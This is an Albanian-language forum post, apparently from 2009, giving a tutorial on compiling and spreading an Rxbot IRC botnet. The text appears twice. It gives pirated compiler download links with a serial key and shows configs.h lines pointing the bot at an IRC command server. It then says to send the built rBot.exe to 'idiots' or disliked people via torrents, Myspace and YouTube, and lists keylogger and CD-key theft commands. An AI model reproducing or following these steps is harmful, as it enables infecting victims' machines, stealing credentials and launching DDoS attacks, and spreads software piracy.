Regjistrohu Very Happy
Me Respekt "Bashkim": Qipii92: iliri

  Si me kriju ni BOT NET

  Share
  avatar
  qipii92
  Webmaster
  Webmaster

  Numri i postimeve : 391
  Join date : 09/06/2009
  vjeqar/e : 26
  Lokacioni : G-ilan

  Si me kriju ni BOT NET

  Mesazh nga qipii92 prej Fri Jun 12, 2009 9:09 am

  BotNet mund te perdoret per gjithqka ps : Ddos , qe te Gjeni passwords , cdkeys ,
  qe te hapni Sajta e shume e shume sende te tjera
  Prandaj une e shkruaj kete Tutorial

  Ndiqni tutorialin :

  1. Se pari e Instaloni kete C++ Compilier

  Download Mcft Visual C++ 6.0 Standard Edition

  Kodi:
  rapidshare.com msc__.rar.html
  Pass: itzforblitz
  Serial: 812-2224558

  Instaloni por mos harroni te Regjistroni


  Download and install Service Pack 6

  Kodi:
  rapidshare.com Vs6sp6.rar

  Pasi qe ta keni instaluar / Shkoni Windows Platform SDK


  Hapeni Mcft Visual C++ compilier 6.0
  Shkoni tek Tools / Options dhe klikoni tek Directories
  Tani Beni browse ne kete Directorium dhe shtoni ato ne list
  ( Klikoni ne Pikat e Boxit qe ti shtoni )


  CROGRAM FILESMcft PLATFORM SDK
  CROGRAM FILESMcft PLATFORM SDKBIN
  CROGRAM FILESMcft PLATFORM SDKINCLUDE
  CROGRAM FILESMICROSOFRT PLATFORM SDKLIB


  Tani shikoni ato ne tabel sikur ne Foton e Meposhtme  Ndoshta nuk ju intereson se qka Fshihet pas ketyre Vijave
  3. Konfigurimi i BOT

  Shkoni dhe depaketoni kete BOT SOurce


  Kodi:
  rapidshare.com botnetsorce.rar
  Ju do te shiheni Rxbot 7.6 folder
  Hapeni Rxbot 7.6 > configs.h Follderin dhe editoni Keto linja

  Kodi:
  char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
  char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
  char serverpass[] = ""; // server password (not usually needed)
  char channel[] = "#botz_channel"; // channel that the bot should join
  char chanpass[] = "My_channel_pass"; // channel password

  Kodi:
  Optional:
  char server2[] = ""; // backup server
  char channel2[] = ""; // backup channel
  char chanpass2[] = ""; //Backup channel pass

  4. Ndertoni BOT-in e Juaj :

  1. Sigurohuni qe e keni te hapur Mcft Visual C++
  2.Selektoni FILE / Open Workspace
  3. Browse tek Rxbot 7.6 folder dhe hapeni rBot.dsw
  4. Tasti i djatht : rBot Files" edhe click Build
  Kliko ne kete linje per ta pare imazhin e zvogluar.  5.rBot.exe do te jete ne Rxbot 7.6 > Debug folder !!!


  Ne rregull !!! tani merreni Rbot dhe packetoni at dhe dergojeni tek idiotet ose ata qe ja keni inat hehee.

  Disa varianta te mira jan Torrentat, Myspace , Youtube etj

  Command lista

  Kodi:
  rapidshare.com cmands.rar

  Si te Ndertojme Botnet
  BotNet mund te perdoret per gjithqka ps : Ddos , qe te Gjeni passwords , cdkeys ,
  qe te hapni Sajta e shume e shume sende te tjera
  Prandaj une e shkruaj kete Tutorial

  Ndiqni tutorialin :

  1. Se pari e Instaloni kete C++ Compilier

  Download Mcft Visual C++ 6.0 Standard Edition


  Quote:
  Kodi:
  rapidshare.com msc__.rar.html
  Pass: itzforblitz
  Serial: 812-2224558

  Instaloni por mos harroni te Regjistroni


  Download and install Service Pack 6


  Quote:
  Kodi:
  rapidshare.com Vs6sp6.rar


  Pasi qe ta keni instaluar / Shkoni Windows Platform SDK


  Hapeni Mcft Visual C++ compilier 6.0
  Shkoni tek Tools / Options dhe klikoni tek Directories
  Tani Beni browse ne kete Directorium dhe shtoni ato ne list
  ( Klikoni ne Pikat e Boxit qe ti shtoni )


  CROGRAM FILESMcft PLATFORM SDK
  CROGRAM FILESMcft PLATFORM SDKBIN
  CROGRAM FILESMcft PLATFORM SDKINCLUDE
  CROGRAM FILESMICROSOFRT PLATFORM SDKLIB


  Tani shikoni ato ne tabel sikur ne Foton e Meposhtme


  Ndoshta nuk ju intereson se qka Fshihet pas ketyre Vijave
  3. Konfigurimi i BOT

  Shkoni dhe depaketoni kete BOT SOurce
  Code:
  Kodi:
  rapidshare.com botnetsorce.rar
  Ju do te shiheni Rxbot 7.6 folder
  Hapeni Rxbot 7.6 > configs.h Follderin dhe editoni Keto linja
  Kodi:
  char password[] = "Bot_login_pass"; // bot password (Ex: monkey) char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net) char serverpass[] = ""; // server password (not usually needed) char channel[] = "#botz_channel"; // channel that the bot should join char chanpass[] = "My_channel_pass"; // channel password
  Kodi:
  Optional: char server2[] = ""; // backup server char channel2[] = ""; // backup channel char chanpass2[] = ""; //Backup channel pass


  4. Ndertoni BOT-in e Juaj :

  1. Sigurohuni qe e keni te hapur Mcft Visual C++
  2.Selektoni FILE / Open Workspace
  3. Browse tek Rxbot 7.6 folder dhe hapeni rBot.dsw
  4. Tasti i djatht : rBot Files" edhe click Build

  Kliko në meny këtu për të par dimensionin original të imazhit. Dimensioni original është 798x479 kurse madhësia 43 KB. Kliko ne kete linje per ta pare imazhin e zvogluar.


  5.rBot.exe do te jete ne Rxbot 7.6 > Debug folder !!!


  Ne rregull !!! tani merreni Rbot dhe packetoni at dhe dergojeni tek idiotet ose ata qe ju keni inat HaHaHa

  Disa varianta te mira jan Torrentat, Myspace , Youtube etj

  Command lista


  Download
  Kodi:
  rapidshare.com cmands.rar
  Si baze Comanda jane keto

  .login botpassword will login bots
  .logout will logout bots
  .keylog on will turn keylogger on
  .getcdkeys will retrieve cdkeys.


  Per me shume Lexoni Listen e Plote


  5. Tani Shkoni MIRC

  Kodi:
  rapidshare.com mirc632.rar

   Ora është Wed Dec 19, 2018 2:27 pm